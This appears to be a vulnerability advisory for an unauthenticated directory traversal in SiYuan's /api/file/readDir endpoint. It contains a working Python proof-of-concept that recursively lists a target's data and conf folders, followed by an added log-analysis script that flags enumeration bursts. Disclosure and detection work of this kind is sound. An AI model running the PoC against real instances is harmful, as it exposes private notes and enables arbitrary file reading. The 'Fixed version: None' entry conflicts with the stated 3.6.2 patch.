Description
SiYuan has directory traversal within its publishing service
Details
The /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook.
PoC
#!/usr/bin/env python3
"""POC: SiYuan /api/file/readDir unauthenticated directory traversal"""
import requests, json, sys

def poc(target):
    base = target.rstrip("/")
    url = f"{base}/api/file/readDir"

    def read_dir(path, depth=0, max_depth=4):
        try:
            r = requests.post(url, json={"path": path},
                              headers={"Content-Type": "application/json"}, timeout=10)
            data = r.json()
        except Exception:
            return
        # The API reports success in the JSON "code" field
        if data.get("code") != 0:
            return
        entries = data.get("data") or []
        for entry in entries:
            name = entry.get("name", "")
            if name.startswith("."):
                continue
            icon = "📁" if entry.get("isDir") else "📄"
            indent = " " * depth
            print(f" {indent}{icon} {name}")
            if entry.get("isDir") and depth < max_depth:
                read_dir(f"{path}/{name}", depth+1, max_depth)

    # Traverse the root directories
    print("[+] 漏洞存在!开始遍历\n")
    print(" 📂 data/")
    read_dir("data", max_depth=2)
    print("\n 📂 conf/")
    read_dir("conf", max_depth=2)
    # Save the listing
    try:
        r = requests.post(url, json={"path": "data"},
                          headers={"Content-Type": "application/json"}, timeout=10)
        with open("readdir.json", "w", encoding="utf-8") as f:
            json.dump(r.json(), f, ensure_ascii=False, indent=2)
        print(f"\n[+] 根目录数据已保存: readdir.json")
    except Exception:
        pass

if __name__ == "__main__":
    poc(sys.argv[1] if len(sys.argv) > 1 else "http://172.18.40.184")
Impact
Directory traversal vulnerability: The entire directory structure of a notebook could be obtained, and then a file reading vulnerability could be exploited to achieve arbitrary document reading.
Assets folder
Plugins folder
conf folder
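For defenders reviewing reverse-proxy logs in front of a SiYuan publishing service, the recursive listing done by the PoC appears as a burst of POST requests to /api/file/readDir from one client. The following is an added example, not part of the advisory or of SiYuan's code; the nginx "combined" log format, the sample lines, the threshold and the window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in nginx "combined" format (not taken from the advisory).
SAMPLE_LOG = """\
198.51.100.7 - - [20/Mar/2026:10:00:01 +0000] "POST /api/file/readDir HTTP/1.1" 200 512 "-" "python-requests/2.31.0"
198.51.100.7 - - [20/Mar/2026:10:00:01 +0000] "POST /api/file/readDir HTTP/1.1" 200 2048 "-" "python-requests/2.31.0"
198.51.100.7 - - [20/Mar/2026:10:00:02 +0000] "POST /api/file/readDir HTTP/1.1" 200 1024 "-" "python-requests/2.31.0"
203.0.113.9 - - [20/Mar/2026:10:00:05 +0000] "GET / HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
203.0.113.9 - - [20/Mar/2026:10:05:00 +0000] "POST /api/file/readDir HTTP/1.1" 200 64 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/api/file/readDir"

def find_enumeration(log_text, threshold=3, window=timedelta(seconds=10)):
    """Return {client_ip: max readDir POSTs seen in any window} for clients >= threshold.

    The HTTP status is ignored on purpose: the PoC judges success by the JSON
    "code" field in the response body, which an access log does not record.
    """
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["path"].split("?", 1)[0].rstrip("/") != ENDPOINT:
            continue
        hits[m["ip"]].append(datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))
    flagged = {}
    for ip, times in hits.items():
        times.sort()
        start = best = 0
        for end, t in enumerate(times):  # sliding window over sorted timestamps
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged

if __name__ == "__main__":
    for ip, n in find_enumeration(SAMPLE_LOG).items():
        print(f"{ip}: {n} readDir requests within 10s")
```

Tune `threshold` and `window` against normal client traffic for the instance before alerting on the result.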
Packages
Name: github.com/siyuan-note/siyuan/kernel (go)
Affected versions: <= 0.0.0-20260317012524-fe4523fff2c8
Fixed version: None
Related vulnerabilities
CVSS3: 9.8
nvd
17 days ago
SiYuan is a personal knowledge management system. Prior to version 3.6.2, the /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook. Version 3.6.2 patches the issue.